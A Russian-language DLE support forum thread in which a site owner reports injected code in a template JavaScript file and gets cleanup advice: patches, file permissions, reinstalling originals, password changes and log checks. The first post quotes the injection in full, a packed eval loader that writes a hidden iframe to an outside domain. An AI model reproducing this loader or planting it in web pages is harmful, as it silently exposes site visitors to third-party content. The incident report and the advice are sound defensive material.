Vitaliy12J 1 Опубликовано: 30 апреля 2016 Рассказать Опубликовано: 30 апреля 2016 Здравствуйте, заметил посторонний код в скриптах на сайтах. На одном аккаунте хостинга стоит два сайта, один лицензия, второй демо. Код посторонний на обоих, доступ по FTP отключен уже давно, в логах хостинга никаких посторонних действий не зарегистрировано, все входы на хостинг зафиксированы только мои. Код в стандартном шаблоне: <script type="text/javascript" src="/templates/Default/js/libs.js"></script> Ну и добавлен собственно сам код: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<2 5="9://b.e/d/" h=1 4=1 8="c" g=0 6=0 a=0 f=i></2>\');',19,19,'||iframe|document|height|src|marginheight|write|style|http|marginwidth|liventernet|hidden||ml|scrolling|frameborder|width|no'.split('|'),0,{})) Версия DLE 9.4 В общем на что следует обратить внимание или лучше хостинг поменять? Цитата Ссылка на сообщение Поделиться на других сайтах
webair 178 Опубликовано: 30 апреля 2016 Рассказать Опубликовано: 30 апреля 2016 http://dle-news.ru/bags/v10/ http://dle-news.ru/bags/v96/ и выставление правильных прав CHMOD на папки и файлы согласно документации Цитата Ссылка на сообщение Поделиться на других сайтах
Vitaliy12J 1 Опубликовано: 30 апреля 2016 Рассказать Опубликовано: 30 апреля 2016 Автор 4 часа назад, webair сказал: http://dle-news.ru/bags/v10/ http://dle-news.ru/bags/v96/ и выставление правильных прав CHMOD на папки и файлы согласно документации Патчи все стояли кроме 10, права на файлы выставлены согласно документации. Цитата Ссылка на сообщение Поделиться на других сайтах
germanydletest 442 Опубликовано: 30 апреля 2016 Рассказать Опубликовано: 30 апреля 2016 10 часов назад, Vitaliy12J сказал: на что следует обратить внимание на дату изменения файлов /templates/Default/js/libs.js на обоих сайтах, потом попросить тп хостинга, что бы они смотрели в логах сервера, из-под какого пользователя были внесены изменения в данные файлы (возможно это был root) и тогда уже либо сис-админы хостинга закроют дыры в ПО на сервере, либо же это где-то ваш прокол 1 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 039 Опубликовано: 30 апреля 2016 Рассказать Опубликовано: 30 апреля 2016 13 часа назад, Vitaliy12J сказал: В общем на что следует обратить внимание или лучше хостинг поменять? Для удаления шеллов на сервере, со стороны DLE Вам необходимо проделать следующее: 1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива. 2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/ 3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения. 4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения. 5. Изменить все пароли, как к хостингу, так и к DLE. 6. Удалить в админпанели всех администраторов кроме себя. 7. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения. 8. После обязательного выполнения пункта 1, если стоят старые версии скрипта, обязательно установить повторно все патчи безопасности http://dle-news.ru/bags/ Со стороны сервера: Обновить полностью все серверное ПО и сменить все пароли. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
Vitaliy12J 1 Опубликовано: 1 мая 2016 Рассказать Опубликовано: 1 мая 2016 Автор 23 часа назад, germanydletest сказал: на дату изменения файлов /templates/Default/js/libs.js на обоих сайтах, потом попросить тп хостинга, что бы они смотрели в логах сервера, из-под какого пользователя были внесены изменения в данные файлы (возможно это был root) и тогда уже либо сис-админы хостинга закроют дыры в ПО на сервере, либо же это где-то ваш прокол В том то и дело что дата на файле не изменилась. 21 час назад, celsoft сказал: Для удаления шеллов на сервере, со стороны DLE Вам необходимо проделать следующее: 1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива. 2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/ 3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения. 4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения. 5. Изменить все пароли, как к хостингу, так и к DLE. 6. Удалить в админпанели всех администраторов кроме себя. 7. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения. 8. После обязательного выполнения пункта 1, если стоят старые версии скрипта, обязательно установить повторно все патчи безопасности http://dle-news.ru/bags/ Со стороны сервера: Обновить полностью все серверное ПО и сменить все пароли. Интересно вот что, на Демо сайте где тоже есть посторонний код, там на самом сайте всего две новости и все кроме регистрации и комментариев отключено. Еще пару лет назад на этом же хостинге постоянно отключался вывод похожих новостей, кто то в настройках PHP файла отключал, я думаю что сами работники хостинга таким способом боролись с нагрузкой. Хотя я у них по этому поводу спрашивал, они отнекивались. После того случая, что то пропало доверие к ним. Сайты там уже очень давно, это был мой первый хостинг (Jino), сейчас переношу потихоньку от туда сайты. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.